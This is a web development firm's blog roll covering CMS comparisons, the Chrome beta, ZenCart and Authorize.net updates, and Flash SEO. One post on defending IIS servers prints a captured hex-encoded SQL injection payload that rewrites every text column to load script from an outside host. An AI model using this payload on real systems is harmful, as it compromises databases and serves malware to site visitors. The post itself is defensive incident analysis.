About Web Development by Activo

We have been receiving a lot of comparison inquiries lately and I wanted to put this simple Joomla vs Ektron content management systems comparison table out there. Have in mind that much of the decision of which CMS to choose for your company or organization is usually made way before this comparison since the two systems are different in such a fundamental level. However, this is a comparison of those fundamentals plus some of the ‘interesting’ features.

Joomla vs Ektron

Thoughts?

Google Chrome is new (still in beta) and I went a head and installed it on one of our VMs. It seems like a lot of the functionality from the popular Firefox extension ‘FireBug’ is built in. Here are the screen shots:

Google Chrome Screenshot 1: Main Page

Google Chrome Screenshot 2: Search right from the address bar

Google Chrome Screenshot 3: Browsing History

Google Chrome Screenshot 4: Incognito Browsing

Google Chrome Screenshot 5: Right Clicking a Link Uses Google Gears

Google Chrome Screenshot 6: Inspecting Page Elements a-la Firebug

Google Chrome Screenshot 7: View Source

Google is now officially in the browser business. I guess that the google bars wasn’t enough of a penetration into the browser market and Google wanted/needed additional features (and feedback?) from users. Anyway, Google now offers a new web browser: Chrome. Google also explained briefly why they have decided to launch a new browser. So, what does it mean for us, web developers?

1. An additional browser to pay attention to and run tests for. When Google launches a new browser, it is not another niche browser that we can skip in our testing. It is probably going to have a sizeable market share.
2. Visit the ‘For Web Developers‘ page posted by Chrome. You will find useful information for what we do. Once piece of advice is if we tested our sites on Safari 3.1 - then the page will work fine on Google Chrome. However, they still post some tips and testing tools.
3. Explore and learn V8 - the underlying engine that powers Google Chrome. According to Google V8 is a platform that will help power the next generation of web applications. As mentioned on their ‘Why’ page: “We also built V8, a more powerful JavaScript engine, to power the next generation of web applications that aren’t even possible in today’s browsers.”

It is never boring in the world of web development, is it?

Written by Kimberly Elam, Web Design by Design made me think twice before running to draft the next web site design with our designer. This same minimalistic approach of almost too little but just enough to make a clear point approach is great because it begs for more. As Kimberly puts it, the user remains hungry for more information. And guess what they will probably do? call or email for more information!

This article highlites the a similar line of thought for successful web firms: they target what their clients need not what they can do with technology or design. Hence this comes to remind us that websites, in any aspect: design or web development, are here to serve the business. A website is just a tool not the goal.

This comes accross with our line of though at Activo: each one of our proposals begin with what are the goals in this project. In other words, what will we achieve by the following web development project?

The ZenCart developer team seems to be hard at work and preparing to deliver a new version of ZenCart: ver 1.4. The core developers posted a roadmap brief for version 1.4 back in September of 2007. Recently, additional entries have been posted in the forums describing in more detail the upcoming changes and signaling a new release is to be expected soon.

The currently described updates to ZenCart are done all around the DB, its architecture, and improving its performance. To summarise from the ZenCart forums:

New Database Driver Layer
Extremely light/flexible drivers make it easier to support other Database Types
Preliminary support for innodb and mysql transactions

Sql Caching system rewritten
Much easier to add new caching types
Preliminary Support for Memcache

Use of MPTT for category structure
Reduces number of queries needed to ‘describe’ the category structure
Improves user experience thru reduced page load times

Supporting Classes to reduce query load
Hugely reduces queries needed
Reuses queries using Cache to further improve performance

The roadmap for ZenCart ver 1.4 promises the following updates to the code (summarized):

• Better usage of PHP 5.2 features. This also means 5.2 will be the new minimum requirement.
• More Object Oriented code, less of the old osCommerce code.
• Lots of DB improvements (some is described above, seems more is yet to come).
• Category structure converted to MPTT format. MPTT stands for Modified Preorder Tree Traversal (explanation of MPTT).
• Performance improvements for sites with lots of product attributes.
• More function libraries converted to classes.
• Duplicate components shared between admin and catalog.
• Template system enhancements: less tables and more admin control.
• Additional notifiers for the observer system.
• Transaction support with InnoDB. Also mentioned as initial stage according to the recent posts of the updates that were done so far.
• SwiftMailer instead of phpMailer.
• Stock and SKU per product attribute.
• Security enhancements.

Keep up the good work!

Just a quick note that Authorize.net will be upping the limit on the transaction id field. Apperently, they are close to reaching the limit of the field type, so they are adding digits to the field - we are talking about some really big numbers! ZenCart seems to have acknowledged the news and tested their latest stable release. On ZenCart’s end, all seems to be ok except a small DB change that will only affect shops that choose to store the transactions over time. Hence a quick fix is posted on ZenCart’s forum.

This also means that all plugins, modules, or any Authorize.net integration scripts need to be tested. This change will probably not be a make or break for any code that integrates with Authorize.net APIs, but it is worth verifying your code and your shopping cart just in case.

Originally Posted by Authorize.net:

What is going on with the Transaction ID field?
The Transaction ID field was originally developed with a maximum numeric value of 2,147,483,647. As the number of merchants using the Authorize.Net Payment Gateway has grown, we have identified a time in the near future in which the Transaction ID count will surpass 2,147,483,647. For this reason, we are in the process of expanding the range of Transaction IDs that the payment gateway can issue. Accordingly, we are communicating to all Authorize.Net merchants to verify that your systems can accommodate a 10-digit Transaction ID greater than 2,147,483,647.

I noticed one of our client’s IIS web servers was getting a lot of SQL Injection attempts this past week. These attacks pass T-SQL code into querystring parameters in hopes that the application is not checking inputs.

Here’s the code: (I removed the SQL exec() statement and replaced it with print so you can see the unencoded SQL.)

DECLARE @S VARCHAR(4000);SET @S=CAST(0×4445434C4152452040542
05641524348415228323535292C4043205641524348415228323535292
04445434C415245205461626C655F437572736F7220435552534F52204
64F522053454C45435420612E6E616D652C622E6E616D652046524F4D2
07379736F626A6563747320612C737973636F6C756D6E7320622057484
5524520612E69643D622E696420414E4420612E78747970653D2775272
0414E442028622E78747970653D3939204F5220622E78747970653D333
5204F5220622E78747970653D323331204F5220622E78747970653D313
63729204F50454E205461626C655F437572736F72204645544348204E4
558542046524F4D205461626C655F437572736F7220494E544F2040542
C4043205748494C4528404046455443485F5354415455533D302920424
547494E20455845432827555044415445205B272B40542B275D2053455
4205B272B40432B275D3D525452494D28434F4E5645525428564152434
841522834303030292C5B272B40432B275D29292B27273C73637269707
4207372633D687474703A2F2F7777772E393868732E72752F6A732E6A73
3E3C2F7363726970743E27272729204645544348204E4558542046524F4
D205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F434154452
05461626C655F437572736F7220 AS VARCHAR(4000));

print @S;

This particular attack is well known and has been sighted in several variants:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Using the following web application best practices, we avoid getting hacked:

• Application level:
  • Never trust user input (e.g. querystring or form posts). Always consider that user input may contain exploit code and check it appropriately.
  • Always use Stored Procedures and/or Parameterized database queries. Don’t build SQL queries using string concatenation.
  • Use typed variables when possible. Converting a querystring parameter to an integer before passing it to a SQL query can inhibit some attacks.
• Database level:
  • Use limited database permissions. For example, for SQL Server, don’t let you application run under the “sa” user. The database user should only have permission in the particular database used by the application.
  • If possible, disable extended stored procedures such as xp_cmdshell.
  • Don’t use dynamic SQL. Dynamic SQL can be just as bad as building queries using string concatenation.
    Some DBAs have server-wide policies of no Dynamic SQL.

• Web server level:
  • If appropriate, filter requests. IIS 7 offers requestFiltering options. http://msdn.microsoft.com/en-us/library/ms689462.aspx
    For example, the maxQueryString parameter could be used to block the exploit attempt above.
  • For II6: http://technet.microsoft.com/en-us/security/cc242650.aspx
• Miscellaneous
  • Install security patches as soon as they become available.

The application level is crucial. Since a web application may someday be moved to a new server, we can’t assume that the web server and database have been configured using best practices.

All layers of security are important, though: If you’re using a third-party or closed-source web application, you may not have access to application code. In that case, the Database and Web Server layers are your last defense against exploits in improperly written code.

You’ll love Joomla! CMS because it is a great open source and free CMS with lots of features, stable releases, and it comes with a huge supporting community. Don’t get us wrong, we love Joomla CMS too and truly believe that this open source application is a big head start for any content based website. But since we used Joomla on many advanced Web 2.0 websites, we have found its limits, and sometimes struggled with those limits to a point of considering other systems or even using a framework instead. Let’s look closer at the missing features:

1. Directory or node base category structure

This is one of the biggest pain points with using Joomla or trying to explain how to use Joomla to new users. Joomla places all content items within sections and categories. Before Joomla 1.5, all content items were required to be in one of these sections and categories. In other words, the system was limited to a two level categorization and the categorization was enforced. In Joomla 1.5, it is not a requirement, however, if you wish to categorize the content items you must use this archaic system.

So, what’s missing? It needs a node based categorization. Similar to any folder structure out there in any operating system. You can create folders with content items in them and you have a nice flexible and fully comprehensible system. No more workarounds. This will then boost the use of any dynamic plugins that can rely on the folder structure for certain features. A great example is a News & Events section that is needed for almost every serious website: with flexible node system you can create a news folder and an events folder and place your articles there. If in the future you wish to add sub categories to your news - no problem! (with the current and the old system - you’ll have to rethink once you get to a certain depth level).

2. A Real Authorship Path and Publication Mechanism

Yes, it is true that users have multiple levels right out of the box in Joomla. But it lacks any sort of a mechanism that controls the workflow of the content item. Ideally, you will have one user that will add new content items and another that will have to approve before it goes live in a specific section. The publisher user will have the rights to publish only in his/her sections, etc. This is a basic feature in many enterprise content management systems.

3. Content Articles Versioning

In Joomla, once you made the change and hit that save button - there is no way to go back in time and undo your changes. Ideally, Joomla will save every instance of the content item and keep track of its versions. How it does it is not important, whether it uses SVN like versioning which efficiently saves only the diff values, or if it actually saves the entire content item every time a revision is made does not matter. The feature that is missing is the versioning itself.

4. Built In Separation Between ‘Live’ and ‘Staging’ Environments

For businesses that value their websites and understand the sensitivity of them, we always recommend setting up a staging environment. This is where all users, developers, and designers can see the latest revisions before it goes live. It provides another stage of error handling instead of working a fire drill on a regular basis. Many enterprise content management systems have this option as a built-in mechanism. From the same admin panel or work area, the admin presses a button and the latest version of the site is then ‘pushed’ live. We currently have linux scripts that do the job but there is no way for a non-developer to handle this case. Ideally, this needs to be from the admin panel of Joomla.

5. Document Management System (File Manager)

So, we all know that Joomla’s File Manager or ‘Media’ manager is a bit lacking. It has the basic functionality that assists with uploading files, moving, deleting them - but that’s it. A DMS (Document Management System) allows each user to manage their own document area, which in turn allows better handling of uploading and using files with drag and drop controls, and improved management interface for admins that can more easily handle large amount of folders and files.

Conclusion

Joomla CMS is a great open source CMS, no doubt. However, if the above five missing features are added, it will make it easier for us to be able to offer this CMS to the enterprise. For now, the commercial CMS spectrum is what we got to work with for enterprise level content management systems.

We recently spotted an article from Bill Roger’s blog (Ektron’s CEO) which discusses usage of the Ektron Server Controls v.s. Ektron’s API. At Activo, we are constantly using both approaches and indeed each approach is a bit different and is used in different situations. The article makes it much clearer that Ektron actually put more effort than we thought before into the Server Controls. Understanding that the Server Controls were made for this sort of usage makes us now feel more secure using this method. Previously, I always thought of this method as a hack and preferred the API.

Frank heads our .NET development team and added the following:

I’ve found it easier to start off with a foundation of one of the server controls and build off of that, rather than using only API calls. The server control acts as a “datareader” which can be used to access the data initially. Many of the custom controls we built to replace XSLT use this model:

• Add a ListSummary inside the user control/page and set its properties.
• Access the ListSummary’s EkItems property.
• Manipulate the data from EkItems, transform it, and output it into a repeater.

This tends to work more reliably than using the API calls. However, if the code needs to bypass the permissions model, the only option is to go direct using the API.

Those of you who worked with Activo on SEO projects know that we have always opposed Flash. At Activo we always valued traffic over look & feel which translated into avoiding Flash technology altogether. Well, no more! If it is true that Flash sites can now receive ‘equal’ treatment, then we will give Flash its place in our Web Development practices.

In recent days, both Adobe and Google issued press releases and blog articles how Google’s crawler will be able to read into Shockwave (.swf) files. This means that all text, menus, and content that is embedded in a Flash object file will now be readable by search engines. Adobe published the Showkwave standards so search engines will be able to read it and Google was one of the first to respond and announce that it knows how to read Shokwave contents. What a welcomed change!

What this means is that we will now have additional parameters to take into account, especially in websites that have decided not to work with flash as their main platform but instead offer a small portion of their home page in flash (such as a banner or a rotating main message). Additionally, if this holds true and Google will be able to read into Shokwave (flash) files than we will start seeing more flash based sites coming up in the Organic search results from Google and search engines.

Sources:

• http://www.adobe.com/aboutadobe/pressroom/pressreleases/200806/070108AdobeRichMediaSearch.html